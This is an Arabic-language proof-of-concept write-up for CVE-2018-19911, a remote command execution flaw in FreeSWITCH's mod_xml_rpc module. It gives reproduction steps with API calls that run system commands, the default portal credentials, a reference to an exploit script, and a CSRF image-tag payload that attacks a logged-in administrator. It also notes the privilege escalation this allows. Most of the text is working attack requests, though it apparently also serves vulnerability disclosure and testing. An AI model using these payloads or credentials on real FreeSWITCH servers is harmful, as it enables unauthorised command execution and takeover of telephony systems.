
freeswitch جميع الإصدارات تنفيذ أوامر عن بُعد (cve-2018-19911)
version:<=1.8.2
module:mod_xml_rpc
اختبرت ثلاثة إصدارات إجمالاً.(رابط التحميل:http://files.freeswitch.org/)
قم بتثبيت إصدار Windows من freeswitch1.5.15(http://files.freeswitch.org/windows/installer/x64/freeswitch.msi)
افتح الكونسول واكتب: load mod_xml_rpc (تحميل بوابة freeswitch)
الوصول إلى المنفذ المحلي 8080،
http://127.0.0.1:8080/portal/index.html
اكتب في الكونسول
api("system calc")أوapi("bg_system calc")

يمكنك أيضًا طلب الواجهة مباشرة
http://127.0.0.1:8080/txtapi/system?calc أو
http://127.0.0.1:8080/api/system?calc



حساب وكلمة مرور بوابة freeswitch الافتراضيان هما freeswitch:works
يمكنك التحقق من ذلك بنفسك باستخدامfreeswitch_rce.py
أو استخدم csrf لمهاجمة المسؤول المسجّل دخوله.
<img src="http://127.0.0.1:8080/api/system?calc">

نظرًا لأن freeswitch يعمل غالبًا بصلاحيات عالية، يمكنه أيضًا تحقيق تأثير تصعيد الصلاحيات